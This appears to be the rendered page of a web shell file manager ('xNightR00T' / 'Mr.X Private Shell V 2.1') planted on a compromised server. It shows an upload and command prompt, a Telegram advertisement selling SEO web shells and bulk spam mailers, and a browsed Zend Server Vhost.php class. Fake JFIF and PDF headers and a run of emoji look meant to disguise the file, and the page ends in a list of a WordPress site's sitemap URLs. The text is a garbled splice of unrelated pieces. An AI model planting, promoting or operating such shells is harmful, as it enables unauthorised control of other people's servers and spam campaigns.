xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace Vhost\Entity;

use ZendServer\Set;

class Vhost
{
    const STATUS_UNKNOWN                = -1;
    const STATUS_OK                     = 0;
    const STATUS_ERROR                  = 1;
    const STATUS_PENDING_RESTART        = 2;
    const STATUS_MODIFIED               = 3;
    const STATUS_DEPLOYMENT_NOT_ENABLED = 4;
    const STATUS_CREATE_ERROR           = 5;
    const STATUS_WEBSITE_STOPPED        = 6;
    const STATUS_WARNING                = 50;

    protected $ID;
    protected $NAME;
    protected $PORT;
    protected $TEXT;
    protected $TEMPLATE;
    protected $CREATED_AT;
    protected $LAST_UPDATED;
    protected $APPLICATION_POOL;
    protected $OWNER;
    protected $DOCUMENT_ROOT;
    protected $CONFIG_FILE;
    protected $IS_DEFAULT;
    protected $IS_SSL;
    protected $CRT_FILE;
    protected $CRT_KEY_FILE;
    protected $CRT_CHAIN_FILE;
    protected $SSL_APP_NAME;
    protected $ADDRESS;
    protected $ACTIVE_NODES;

    /**
     * @var Set
     */
    protected $applications;
    protected $BINDINGS;

    public function getId()
    {
        return $this->ID;
    }

    public function getName()
    {
        return $this->NAME;
    }
    
    public function getHostname() 
    {
        if (!empty($this->BINDINGS) && !empty($this->BINDINGS[0]['HOSTNAME'])) {
            return $this->BINDINGS[0]['HOSTNAME'];
        } else {
            return $this->getName();
        }
    }

    public function getPort()
    {
        // get the first port from the bindings
        if (!empty($this->BINDINGS)) {
            foreach($this->BINDINGS as $binding) {
                return $binding['PORT'];
            }
        }
        
        return $this->PORT;
    }

    public function isDefault()
    {
        return $this->IS_DEFAULT;
    }

    public function getTemplate()
    {
        return $this->TEMPLATE;
    }

    public function getText()
    {
        return $this->TEXT;
    }

    public function getConfigFile()
    {
        return $this->CONFIG_FILE;
    }

    public function getDocRoot()
    {
        return $this->DOCUMENT_ROOT;
    }

    public function getCreatedAt()
    {
        return $this->CREATED_AT;
    }

    public function getLastUpdated()
    {
        return $this->LAST_UPDATED;
    }
    
    public function getApplicationPool()
    {
        return $this->APPLICATION_POOL;
    }

    public function getOwner()
    {
        return $this->OWNER;
    }

    public function getAddress()
    {
        // get the first address from the bindings
        if (!empty($this->BINDINGS)) {
            foreach($this->BINDINGS as $binding) {
                return $binding['ADDRESS'];
            }
        }
        
        return $this->ADDRESS;
    }
    
    public function getActiveNodes() {
        return $this->ACTIVE_NODES;
    }

    public function isZendDefined()
    {
        return $this->OWNER == '1';
    }

    public function isManagedByZend()
    {
        return $this->OWNER == '1' || $this->OWNER == '2';
    }

    /**
     * @return boolean
     */
    public function isSsl()
    {
        // get the first is_ssl from the bindings
        if (!empty($this->BINDINGS)) {
            foreach($this->BINDINGS as $binding) {
                return strtolower($binding['IS_SSL']) == 'true' || (is_numeric($binding['IS_SSL']) && intval($binding['IS_SSL']) == 1);
            }
        }
        
        return strtolower($this->IS_SSL) == 'true' || (is_numeric($this->IS_SSL) && intval($this->IS_SSL) == 1);
    }

    /**
     * @return string
     */
    public function getCertificatePath()
    {
        return $this->CRT_FILE;
    }

    /**
     * @return string
     */
    public function getCertificateKeyPath()
    {
        return $this->CRT_KEY_FILE;
    }

    /**
     * @return string
     */
    public function getCertificateChainPath()
    {
        return $this->CRT_CHAIN_FILE;
    }

    /**
     * @return string
     */
    public function getAppName()
    {
        return $this->SSL_APP_NAME;
    }

    /**
     * @return Set
     */
    public function getApplications()
    {
        return $this->applications;
    }

    /**
     * @param \ZendServer\Set $applications
     */
    public function setApplications($applications)
    {
        $this->applications = $applications;
    }
    
    /**
     * @return Set
     */
    public function getBindings()
    {
        return $this->BINDINGS;
    }
    
    /**
     * @param \ZendServer\Set $bindings
     */
    public function setBindings($bindings)
    {
        $this->BINDINGS = $bindings;
    }
}

Filemanager

Name Type Size Permission Actions
Vhost.php File 4.5 KB 0644
VhostNode.php File 651 B 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml